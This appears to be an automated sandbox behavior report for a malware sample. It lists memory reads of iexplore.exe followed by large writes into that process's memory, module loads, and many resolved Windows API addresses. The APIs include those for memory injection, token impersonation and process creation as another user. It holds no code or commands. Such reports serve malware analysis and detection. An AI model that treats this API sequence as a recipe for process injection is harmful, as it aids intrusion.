| Read | c:\program files\internet explorer\iexplore.exe | address = 2147332096, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2822592, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2824600, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147344384, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 594368, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 596410, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147332096, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2822592, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2824600, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147344384, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 594368, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 596410, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147332096, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2822592, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2824600, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147344384, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 594368, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 596410, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147332096, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2822592, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2824600, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147344384, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 594368, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 596410, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147332096, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2822592, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2824600, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147344384, size = 472 |
|
1 | |
| Write | c:\program files\internet explorer\iexplore.exe | address = 0x1a00000, size = 79360 |
|
1 | |
| Write | c:\program files\internet explorer\iexplore.exe | address = 0x1a13600, size = 32 |
|
1 | |
| Write | c:\program files\internet explorer\iexplore.exe | address = 0x1a90000, size = 79360 |
|
1 | |
| Write | c:\program files\internet explorer\iexplore.exe | address = 0x1aa3600, size = 32 |
|
1 | |
|
For performance reasons, the remaining 6 entries are omitted.
The remaining entries can be found in glog.xml. |
|||||
Module (43922)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.dll | base_address = 0x76b10000 |
|
1 | |
| Load | USER32.dll | base_address = 0x76c00000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x774c0000 |
|
1 | |
| Load | WTSAPI32.dll | base_address = 0x73f10000 |
|
1 | |
| Load | USERENV.dll | base_address = 0x74b30000 |
|
1 | |
| Load | WS2_32.dll | base_address = 0x75a90000 |
|
1 | |
| Load | SHLWAPI.dll | base_address = 0x771d0000 |
|
1 | |
| Load | ntdll.dll | base_address = 0x77330000 |
|
1 | |
| Load | CRYPT32.dll | base_address = 0x75610000 |
|
1 | |
| Load | Secur32.dll | base_address = 0x75390000 |
|
1 | |
| Load | SHELL32.dll | base_address = 0x75bb0000 |
|
1 | |
| Load | api-ms-win-core-synch-l1-2-0 | base_address = 0x0 |
|
4 | |
| Load | api-ms-win-core-synch-l1-2-0 | base_address = 0x6c330000 |
|
4 | |
| Load | api-ms-win-core-fibers-l1-1-1 | base_address = 0x0 |
|
8 | |
| Load | kernel32 | base_address = 0x0 |
|
4 | |
| Load | kernel32 | base_address = 0x76b10000 |
|
4 | |
| Load | api-ms-win-core-localization-l1-2-1 | base_address = 0x0 |
|
4 | |
| Load | api-ms-win-core-sysinfo-l1-2-1 | base_address = 0x0 |
|
2 | |
| Load | KERNEL32.dll | base_address = 0x0 |
|
1 | |
| Load | psapi.dll | base_address = 0x759d0000 |
|
1 | |
| Load | kernel32.dll | base_address = 0x76b10000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x76b10000 |
|
2 | |
| Get Handle | c:\windows\system32\advapi32.dll | base_address = 0x774c0000 |
|
35 | |
| Get Handle | c:\windows\system32\shell32.dll | base_address = 0x75bb0000 |
|
43492 | |
| Get Handle | c:\windows\system32\ntdll.dll | base_address = 0x77330000 |
|
3 | |
| Get Filename | api-ms-win-core-localization-l1-2-1 | process_name = c:\windows\system32\svchost.exe, file_name_orig = C:\Windows\system32\svchost.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\system32\kernel32.dll | function = QueryPerformanceFrequency, address_out = 0x76b522a7 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetCurrentDirectoryA, address_out = 0x76b5903d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentDirectoryA, address_out = 0x76b4733c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTickCount, address_out = 0x76b5ba60 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemTime, address_out = 0x76b5ced8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = lstrcmpiA, address_out = 0x76b52249 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x76b5bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlushInstructionCache, address_out = 0x76b523c6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FreeLibrary, address_out = 0x76b5d9d0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadProcessMemory, address_out = 0x76b4c1ce |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = VirtualAllocEx, address_out = 0x76b4c1b6 |
|
2 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x76b633d3 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetNativeSystemInfo, address_out = 0x76b4be77 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExA, address_out = 0x76b63861 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x76b6395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetModuleHandleA, address_out = 0x76b5cf41 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ResumeThread, address_out = 0x76b50f1c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = VirtualAlloc, address_out = 0x76b62fb6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = VirtualFree, address_out = 0x76b61da4 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetLastError, address_out = 0x76b5bb08 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteProcessMemory, address_out = 0x76b4c1de |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = HeapReAlloc, address_out = 0x7739ff51 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ExitProcess, address_out = 0x76b6214f |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileW, address_out = 0x76b5cc56 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x7738cd10 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointerEx, address_out = 0x76b4f5b2 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetConsoleMode, address_out = 0x76b62412 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetConsoleCP, address_out = 0x76b62c8a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlushFileBuffers, address_out = 0x76b47f81 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetStdHandle, address_out = 0x76b9f589 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x76b61dc3 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x76b61dbc |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCommandLineW, address_out = 0x76b6679e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCommandLineA, address_out = 0x76b698ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateThread, address_out = 0x76b6375d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x76b5ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetExitCodeThread, address_out = 0x76b46ddd |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = lstrcmpA, address_out = 0x76b48c59 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = lstrlenA, address_out = 0x76b5a611 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77389ac5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = InitializeCriticalSection, address_out = 0x7738a149 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LeaveCriticalSection, address_out = 0x77377760 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EnterCriticalSection, address_out = 0x773777a0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcessHeap, address_out = 0x76b61280 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = HeapAlloc, address_out = 0x77382dd6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = HeapSize, address_out = 0x77389bec |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = HeapValidate, address_out = 0x76b525dd |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = HeapFree, address_out = 0x76b5bbd0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = Sleep, address_out = 0x76b5ba46 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCPInfo, address_out = 0x76b61e2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetOEMCP, address_out = 0x76b53db9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsValidCodePage, address_out = 0x76b6c1c0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileExA, address_out = 0x76b9f3ef |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76b60e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x76b6ed38 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x76b63d01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentProcess, address_out = 0x76b5cdcf |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76b52331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x76b676b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x76b53ea8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetStartupInfoW, address_out = 0x76b63891 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetModuleHandleW, address_out = 0x76b6374d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x76b5bb9f |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentProcessId, address_out = 0x76b5cac4 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentThreadId, address_out = 0x76b5bb80 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x76b62fde |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = InitializeSListHead, address_out = 0x77395eeb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x76b596fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSizeEx, address_out = 0x76b559ef |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = VirtualQuery, address_out = 0x76b676d6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76b62d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x76b5a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x76b5cee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x76b547cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SystemTimeToFileTime, address_out = 0x76b5cecb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = Process32First, address_out = 0x76b7443d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = OpenProcess, address_out = 0x76b559d7 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateToolhelp32Snapshot, address_out = 0x76b4f731 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ProcessIdToSessionId, address_out = 0x76b5b744 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GlobalAlloc, address_out = 0x76b59ce1 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = Process32Next, address_out = 0x76b74505 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GlobalFree, address_out = 0x76b59cf9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WTSGetActiveConsoleSessionId, address_out = 0x76b4480b |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateThread, address_out = 0x76b622a7 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x76b12082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsWow64Process, address_out = 0x76b54785 |
|
2 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76b61400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x76b5db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetEndOfFile, address_out = 0x76b52319 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = VirtualProtectEx, address_out = 0x76b9f5d9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76b50273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateNamedPipeA, address_out = 0x76b9d44f |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x7738a295 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = RaiseException, address_out = 0x76b4eb60 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = InterlockedFlushSList, address_out = 0x77383129 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = RtlUnwind, address_out = 0x76b47f70 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x76b63939 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TlsAlloc, address_out = 0x76b635a1 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TlsGetValue, address_out = 0x76b5da70 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TlsSetValue, address_out = 0x76b5da88 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TlsFree, address_out = 0x76b613b8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryExW, address_out = 0x76b54775 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetModuleHandleExW, address_out = 0x76b53e39 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetModuleFileNameA, address_out = 0x76b633f6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x76b6452b |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WideCharToMultiByte, address_out = 0x76b6450e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetStdHandle, address_out = 0x76b61e46 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileType, address_out = 0x76b675a5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteConsoleW, address_out = 0x76b582f1 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetACP, address_out = 0x76b639aa |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetStringTypeW, address_out = 0x76b667c8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LCMapStringW, address_out = 0x76b613d0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadConsoleW, address_out = 0x76b70e73 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x76c13f47 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CryptDestroyHash, address_out = 0x774cdf66 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CryptGetHashParam, address_out = 0x774cdf7e |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CryptGenKey, address_out = 0x774c8ee9 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CryptReleaseContext, address_out = 0x774ce124 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RevertToSelf, address_out = 0x774d1562 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegQueryInfoKeyA, address_out = 0x774ce143 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CryptCreateHash, address_out = 0x774cdf4e |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CryptAcquireContextA, address_out = 0x774c91dd |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CryptGenRandom, address_out = 0x774cdfc8 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CryptAcquireContextW, address_out = 0x774cdf14 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CryptGetUserKey, address_out = 0x77503228 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CryptDestroyKey, address_out = 0x774cc51a |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = ConvertStringSecurityDescriptorToSecurityDescriptorA, address_out = 0x774cca94 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumKeyExA, address_out = 0x774d1481 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegOpenKeyExA, address_out = 0x774d4907 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegSetValueExA, address_out = 0x774d14b3 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyExA, address_out = 0x774d1469 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegQueryValueExA, address_out = 0x774d48ef |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x774d469d |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = GetTokenInformation, address_out = 0x774d431c |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = ConvertSidToStringSidW, address_out = 0x774d4344 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = DuplicateToken, address_out = 0x774cc7e6 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = OpenProcessToken, address_out = 0x774d4304 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = ImpersonateLoggedOnUser, address_out = 0x774cc57a |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = GetUserNameA, address_out = 0x774ea4b4 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDisablePredefinedCacheEx, address_out = 0x77503429 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyA, address_out = 0x774ccd01 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = DuplicateTokenEx, address_out = 0x774cca24 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CreateProcessAsUserA, address_out = 0x77502538 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CryptHashData, address_out = 0x774cdf36 |
|
1 | |
| Get Address | c:\windows\system32\wtsapi32.dll | function = WTSQueryUserToken, address_out = 0x73f11f81 |
|
1 | |
| Get Address | c:\windows\system32\userenv.dll | function = CreateEnvironmentBlock, address_out = 0x74b31a7a |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = 3, address_out = 0x75a93918 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = 2, address_out = 0x75a94582 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = 1, address_out = 0x75a968b6 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = 13, address_out = 0x75a9b001 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = 23, address_out = 0x75a93eb8 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = 4, address_out = 0x75a96bdd |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = 16, address_out = 0x75a96b0e |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = 8, address_out = 0x75a92d57 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = 21, address_out = 0x75a941b6 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = 115, address_out = 0x75a93ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = 52, address_out = 0x75aa7673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = 22, address_out = 0x75a9449d |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = 111, address_out = 0x75a937ad |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = 19, address_out = 0x75a96f01 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = 9, address_out = 0x75a92d8b |
|
1 | |
| Get Address | c:\windows\system32\shlwapi.dll | function = StrCmpNA, address_out = 0x771fc57c |
|
1 | |
| Get Address | c:\windows\system32\shlwapi.dll | function = StrCmpNIA, address_out = 0x771dd11c |
|
1 | |
| Get Address | c:\windows\system32\shlwapi.dll | function = wnsprintfA, address_out = 0x771fedae |
|
1 | |
| Get Address | c:\windows\system32\shlwapi.dll | function = StrStrIA, address_out = 0x771dd250 |
|
1 | |
| Get Address | c:\windows\system32\shlwapi.dll | function = StrStrIW, address_out = 0x771e46e9 |
|
1 | |
| Get Address | c:\windows\system32\shlwapi.dll | function = StrStrA, address_out = 0x771fc45b |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = memchr, address_out = 0x77364c00 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = _wcsicmp, address_out = 0x77386f61 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = memcpy, address_out = 0x77364cc0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = strrchr, address_out = 0x77365900 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = memcmp, address_out = 0x77363b1b |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = strchr, address_out = 0x77377690 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = memset, address_out = 0x77365340 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = strstr, address_out = 0x773775c0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = strncpy, address_out = 0x77365790 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = strncat, address_out = 0x77365650 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = strncmp, address_out = 0x773a25ec |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = memmove, address_out = 0x77365000 |
|
1 | |
| Get Address | c:\windows\system32\crypt32.dll | function = CryptExportPublicKeyInfo, address_out = 0x7564455f |
|
1 | |
| Get Address | c:\windows\system32\crypt32.dll | function = CertNameToStrA, address_out = 0x7566b2df |
|
1 | |
| Get Address | c:\windows\system32\crypt32.dll | function = CertCreateSelfSignCertificate, address_out = 0x75667a93 |
|
1 | |
| Get Address | c:\windows\system32\crypt32.dll | function = CertFreeCertificateContext, address_out = 0x7561f5b5 |
|
1 | |
| Get Address | c:\windows\system32\crypt32.dll | function = CryptSignAndEncodeCertificate, address_out = 0x756674a1 |
|
1 | |
| Get Address | c:\windows\system32\crypt32.dll | function = CertCloseStore, address_out = 0x7561dd10 |
|
1 | |
| Get Address | c:\windows\system32\crypt32.dll | function = CertStrToNameA, address_out = 0x7566b33a |
|
1 | |
| Get Address | c:\windows\system32\crypt32.dll | function = CryptEncodeObject, address_out = 0x75624ba9 |
|
1 | |
| Get Address | c:\windows\system32\crypt32.dll | function = CertSetCertificateContextProperty, address_out = 0x7562bb05 |
|
1 | |
| Get Address | c:\windows\system32\crypt32.dll | function = CertFindCertificateInStore, address_out = 0x756225e8 |
|
1 | |
| Get Address | c:\windows\system32\crypt32.dll | function = CertOpenStore, address_out = 0x7561df23 |
|
1 | |
| Get Address | c:\windows\system32\crypt32.dll | function = CertGetCertificateContextProperty, address_out = 0x75620bda |
|
1 | |
| Get Address | c:\windows\system32\crypt32.dll | function = CertFindExtension, address_out = 0x75622595 |
|
1 | |
| Get Address | c:\windows\system32\crypt32.dll | function = CertCreateCertificateContext, address_out = 0x75620b37 |
|
1 | |
| Get Address | c:\windows\system32\secur32.dll | function = ApplyControlToken, address_out = 0x753c47de |
|
1 | |
| Get Address | c:\windows\system32\secur32.dll | function = QueryContextAttributesA, address_out = 0x753ba43b |
|
1 | |
| Get Address | c:\windows\system32\secur32.dll | function = EncryptMessage, address_out = 0x753b52e4 |
|
1 | |
| Get Address | c:\windows\system32\secur32.dll | function = AcceptSecurityContext, address_out = 0x753b7b49 |
|
1 | |
| Get Address | c:\windows\system32\secur32.dll | function = AcquireCredentialsHandleA, address_out = 0x753ba11a |
|
1 | |
| Get Address | c:\windows\system32\secur32.dll | function = DeleteSecurityContext, address_out = 0x753b3323 |
|
1 | |
| Get Address | c:\windows\system32\secur32.dll | function = InitializeSecurityContextA, address_out = 0x753c4c32 |
|
1 | |
| Get Address | c:\windows\system32\secur32.dll | function = DecryptMessage, address_out = 0x753b53b2 |
|
1 | |
| Get Address | c:\windows\system32\secur32.dll | function = FreeContextBuffer, address_out = 0x753b2daf |
|
1 | |
| Get Address | c:\windows\system32\shell32.dll | function = SHGetSpecialFolderPathA, address_out = 0x75dffb26 |
|
1 | |
| Get Address | c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll | function = InitializeCriticalSectionEx, address_out = 0x0 |
|
4 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x76b6418d |
|
5 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x76b676e6 |
|
5 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76b61e16 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LCMapStringEx, address_out = 0x76b9f72b |
|
3 | |
| Get Address | - | function = EnterCriticalSection, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = LeaveCriticalSection, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = InitializeCriticalSection, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = CloseHandle, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = DeleteCriticalSection, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = SetEvent, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = ResetEvent, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = WaitForSingleObjectEx, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = CreateEventW, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = GetModuleHandleW, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = GetProcAddress, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = IsDebuggerPresent, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = UnhandledExceptionFilter, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = SetUnhandledExceptionFilter, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = GetStartupInfoW, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = IsProcessorFeaturePresent, ordinal = 0, address_out = 0x1df87c |
|
1 | |
| Get Address | - | function = QueryPerformanceCounter, ordinal = 0, address_out = 0x1df87c |
|
1 | |
